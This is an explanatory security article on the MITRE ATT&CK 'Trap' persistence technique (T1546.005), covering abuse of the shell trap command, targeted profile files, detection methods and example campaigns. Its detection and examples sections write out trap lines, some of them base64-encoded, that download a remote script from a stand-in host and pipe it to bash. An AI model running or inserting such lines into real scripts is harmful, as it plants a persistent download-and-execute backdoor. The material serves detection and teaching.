Trap

Information

• Name: Trap

• ID: T1546.005

• Tactics: TA0004, TA0003

• Technique: T1546

Introduction

Trap (T1546.005) is a sub-technique under the MITRE ATT&CK framework categorized within persistence mechanisms. Adversaries leverage the Unix/Linux trap command to execute malicious scripts or commands when shell scripts receive signals or exit events. This allows attackers to maintain persistence on compromised systems by embedding malicious commands within legitimate shell scripts, ensuring repeated execution without direct user intervention.

Deep Dive Into Technique

The Unix/Linux trap command is a built-in shell command used to define and execute actions upon receiving specific signals or upon script termination. Attackers exploit this feature to embed malicious commands or scripts within legitimate shell scripts, resulting in persistent execution each time the script terminates or receives a predetermined signal.

Technical details include:

• Signal Handling: The trap command can intercept various signals, such as:

  • EXIT (executed when a script exits)

  • INT (interrupt from keyboard, typically Ctrl+C)

  • TERM (termination signal)

  • HUP (hangup signal, typically terminal closure or logout)

• Persistence Mechanism: Attackers insert malicious commands into legitimate scripts or configuration files using the syntax:

  Copy

  trap '<malicious_command_or_script>' EXIT

  This ensures that whenever the script exits, intentionally or unintentionally, the malicious command executes.

• Obfuscation Techniques: Adversaries often obfuscate trap commands to evade detection by:

  • Encoding commands with base64 or hex encoding.

  • Embedding commands within complex script logic or conditional statements.

  • Leveraging environment variables to hide malicious payloads.

• Commonly Targeted Files and Scripts: Attackers frequently target scripts executed regularly or at system startup, such as:

  • /etc/profile

  • /etc/bashrc

  • User-specific scripts (~/.bashrc, ~/.bash_profile)

  • System-wide scheduled scripts or cron jobs

When this Technique is Usually Used

This technique predominantly appears in the persistence phase of the cyber kill chain, ensuring that attackers maintain access and control over compromised systems. Common scenarios include:

• Long-term Persistence: After initial compromise, attackers embed trap commands into scripts executed regularly or at system startup, ensuring continuous access.

• Privilege Escalation and Lateral Movement: Attackers may insert malicious trap commands into scripts executed by higher-privileged users or automated processes, facilitating privilege escalation or lateral movement across systems.

• Stealthy Backdoor Implementation: Attackers embed trap commands to quietly execute backdoor scripts or commands upon user logout or script termination, minimizing suspicion and detection risks.

• Post-Exploitation Stage: After initial access and reconnaissance, attackers leverage trap commands to establish persistent footholds, allowing repeated access for further exploitation, data exfiltration, or lateral movement.

How this Technique is Usually Detected

Detection of malicious trap commands involves multiple approaches, including host-based monitoring, behavioral analysis, and signature-based detection. Common detection methods include:

• File Integrity Monitoring (FIM): Tools like OSSEC, Tripwire, or Samhain detect unauthorized modifications to critical system scripts and configuration files.

• Endpoint Detection and Response (EDR) Solutions: Advanced EDR tools (CrowdStrike Falcon, SentinelOne, Carbon Black) identify suspicious script behavior, unusual command executions, and anomalous trap commands.

• Audit Logs and Command History Analysis: Regularly auditing user command histories (~/.bash_history) and system logs (/var/log/auth.log, /var/log/syslog) can reveal unauthorized edits and execution of trap commands.

• Behavioral Analysis and Anomaly Detection: Monitoring tools or SIEM solutions (Splunk, ELK stack) detect anomalous script behaviors, unexpected executions, and unusual signal handling patterns.

• Specific IoCs (Indicators of Compromise):

  • Unusual trap commands embedded in scripts:

    Copy

    trap 'curl http://malicious.example.com/script.sh | bash' EXIT

  • Base64-encoded commands within trap statements:

    Copy

    trap 'echo d2dldCBodHRwOi8vbWFsaWNpb3VzLmV4YW1wbGUuY29tL3NjcmlwdC5zaCAtTy0gfCBiYXNoCg== | base64 -d | bash' EXIT

  • Unusual network connections initiated by scripts upon termination.

Why it is Important to Detect This Technique

Detecting malicious use of the trap command is critical due to several significant impacts:

• Persistent Unauthorized Access: Attackers maintain long-term footholds, enabling repeated unauthorized access, data exfiltration, and further exploitation.

• Privilege Escalation Potential: Malicious trap commands embedded in scripts executed by privileged accounts can facilitate unauthorized privilege escalation.

• Stealth and Evasion: Due to the subtlety and built-in nature of the trap command, attackers can evade traditional detection mechanisms, prolonging dwell time and increasing damage potential.

• Increased Risk of Data Loss and Breaches: Persistent backdoors via trap commands facilitate continuous data exfiltration, intellectual property theft, and sensitive information leakage.

• Operational Disruption and System Stability: Malicious commands executed via trap mechanisms can destabilize systems, disrupt operations, or cause unintended outages.

Early detection ensures timely response, reduces attacker dwell time, and minimizes potential damage to systems, data, and organizational reputation.

Examples

Real-world examples and scenarios involving the malicious use of the trap command include:

• Linux Malware Campaigns (HiddenWasp Malware):

  • Attackers inserted trap commands into legitimate scripts to execute malicious payloads upon script termination.

  • Malicious scripts downloaded additional payloads and established persistent backdoor connections.

  • Impact: Persistent unauthorized access, data exfiltration, and lateral movement across compromised environments.

• Cryptomining Attacks via Trap Commands:

  • Attackers embedded cryptomining scripts into user shell profiles (~/.bashrc) using trap commands to ensure repeated execution upon session termination.

  • Malicious scripts executed cryptomining binaries, causing high CPU utilization and performance degradation.

  • Impact: Resource exhaustion, reduced system performance, increased operational costs.

• Advanced Persistent Threat (APT) Campaigns:

  • Nation-state actors leveraged trap commands within system-wide profile scripts (/etc/profile) to execute stealthy backdoor payloads upon user logout or system reboot.

  • Attackers maintained long-term persistence, enabling espionage, sensitive data exfiltration, and lateral movement.

  • Impact: Compromise of sensitive data, intellectual property theft, and prolonged attacker dwell time.

• Obfuscated Trap Command in Real-world Incident:

  • Attackers inserted base64-encoded commands within trap statements to evade detection:

    Copy

    trap 'echo Y3VybCBodHRwOi8vbWFsaWNpb3VzLmNvbS9iYWNrZG9vci5zaCB8IGJhc2gK | base64 -d | bash' EXIT

  • Malicious scripts downloaded and executed additional backdoors, allowing attackers persistent access and control.

  • Impact: Persistent backdoor establishment, unauthorized access, and operational disruption.

These examples underline the importance of vigilance, proactive monitoring, and effective detection mechanisms to mitigate risks associated with malicious trap command usage.